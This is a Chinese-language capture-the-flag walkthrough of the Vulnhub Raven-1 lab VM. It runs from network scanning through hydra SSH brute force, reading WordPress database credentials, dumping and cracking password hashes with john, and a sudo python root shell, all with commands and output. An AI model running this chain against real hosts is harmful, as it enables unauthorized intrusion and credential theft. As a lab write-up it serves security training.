《Vulnhub通关手册》—— 03 Raven-1

背景概述:

下载地址:https://www.vulnhub.com/entry/raven-1,256/

本次的靶机IP为100.10.10.132,将该IP地址添加到hosts文件内,映射到域名raven.local

1. 信息收集

1.1 扫描目标主机IP

使用arp-scan -l命令进行局域网内部存活主机的扫描。

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1     00:50:56:c0:00:08       VMware, Inc.
100.10.10.132   00:0c:29:5a:b1:05       VMware, Inc.
100.10.10.253   00:50:56:f5:d5:54       VMware, Inc.
100.10.10.254   00:50:56:e1:62:61       VMware, Inc.

根据MAC地址可以找到我们的靶机IP地址为100.10.10.132

1.2 扫描目标主机开放端口

使用nmap进行目标主机开放端口扫描,使用命令nmap -sS -Pn -p 1-65535 100.10.10.132

└─# nmap -sS -Pn -p 1-65535 100.10.10.132  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST
Nmap scan report for 100.10.10.132
Host is up (0.00083s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
40396/tcp open  unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds

根据结果可知目标主机开放了22、80、111、40396端口。

2. Web站点检测

2.1 获取第一个Flag

通过信息收集,我们发现目标主机开放了80端口,因此登上网页查看相关源代码。我们发现http://raven.local/service.html这个url链接下的源代码,存在flag字段——<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

2.2 wordpress扫描

在网页上发现http://raven.local/wordpress/该url下存在wordpress字段。因此可以推测该站点是使用wordpress这个cms框架搭建的。因此可以使用wp-scan来进行扫描。

首先先更新漏洞库。

wp-scan --update

然后对该url进行扫描。

wp-scan --url http://raven.local/wordpress/

根据扫描结果,得出以下:

server: Apache/2.4.10 (Debian)

WordPress version 4.8.17

可以发现,没有什么可以利用的。

2.3 SSH服务爆破

我们发现站点存在urlhttp://raven.local/wordpress/index.php/author/michael/,发现用户名为MICHAEL

可以尝试用该用户名进行SSH服务爆破。

使用hydra生成字典用于密码爆破。字典使用最经典的fasttrack.txt

hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

没有爆出密码。

我们换成cupp生成的字典再进行一遍。[cpuu安装教程]

└─# cupp -i
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael                    # 输入用户名
> Surname: michael                       # 输入用户名
> Nickname: michael                      # 输入用户名
> Birthdate (DDMMYYYY):   


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!

使用命令hydra -l michael -P ./michael.txt ssh://raven.local,生成文件michael.txt,利用该文件再进行一次爆破。

└─# hydra -l michael -P ./michael.txt ssh://raven.local                     
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37

爆破出了账号为michael,密码为michael

使用该账号、密码登录。命令为ssh michael@raven.local。期间会提示是否连接,输入yes

─# ssh michael@raven.local                                                                                             255 ⨯
The authenticity of host 'raven.local (100.10.10.132)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129
michael@Raven:~$ 

3. 提权

3.1 内核版本

使用命令uname -a查看内核版本。

michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

没有发现有什么可以利用的漏洞。

3.2 SUID提权

查看一下SUID。

michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs

没有可以利用的。

3.3 MySQL登录

遍历站点目录/var/www,发现flag2.txt文件。

michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

再查看网站的配置文件/var/www/html/wordpress/wp-config.php

michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost')

发现存在MySQL账户root,密码R@v3nSecurity

使用命令mysql -h localhost -u root -pR@v3nSecurity连接上MySQL数据库。

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

3.4 操作数据库

使用命令show databases;,查看当前数据库。

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)

使用命令use wordpress,进入到wordpress数据库。

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

使用命令show tables,查看当前数据库存在哪些表。

mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

使用命令select * from wp_users,查看wp_users表内的内容。

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

发现存在用户名steven,以及该用户名的密码$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/。该密码是经加密后的。

先将账号密码导出为txt文本。

mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)

查看该文本内容。

michael@Raven:/usr/share$ cat /tmp/wordpress.txt
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

3.5 文件传输

在目标主机上开启http服务进行wordpress.txt文件的传输。在目标主机上进入/tmp目录,运行命令python -m SimpleHTTPServer 8888

michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...

在kali上下载目标主机的wordpress.txt文件。使用命令wget http://raven.local:8888/wordpress.txt

└─# wget http://raven.local:8888/wordpress.txt  
--2021-12-28 16:27:32--  http://raven.local:8888/wordpress.txt
正在解析主机 raven.local (raven.local)... 100.10.10.132
正在连接 raven.local (raven.local)|100.10.10.132|:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:85 [text/plain]
正在保存至: “wordpress.txt”

wordpress.txt                   100%[=====================================================>]      85  --.-KB/s  用时 0s      

2021-12-28 16:27:32 (1.47 MB/s) - 已保存 “wordpress.txt” [85/85])

3.6 John密码破解

使用著名的rockyou.txt(kali自带)字典进行密码的爆破。在usr/share/wordlists目录下运行以下该命令生成rockyou.txt文件。

dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz
gzip -d rockyou.txt.gz

在kali机上,进入wordpress.txt文件所在的目录,运行以下命令,使用john进行密码破解。

└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (steven)

得出steven账号的密码为pink84

使用该账号远程ssh远程连接。使用命令ssh steven@raven.local

└─# ssh steven@raven.local                                                   
steven@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129

查看当前用户权限。

$ whoami
steven

3.7 SUDO提权

尝试使用sudo Python提权。

使用命令sudo python3 -c 'import pty; pty.spawn("/bin/sh")',提权失败。

使用命令sudo python -c 'import os; os.system("/bin/sh")',提权成功。

$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root

进入根目录,查看最后一个flag。

# cd /root
# ls
flag4.txt
# cat flag4.txt
______                      

| ___ \                     

| |_/ /__ ___   _____ _ __  

|    // _` \ \ / / _ \ '_ \ 

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|

                            
flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io
上一篇:Vulnhub 靶场 EVILBOX: ONE


下一篇:Vulnhub-keyring靶机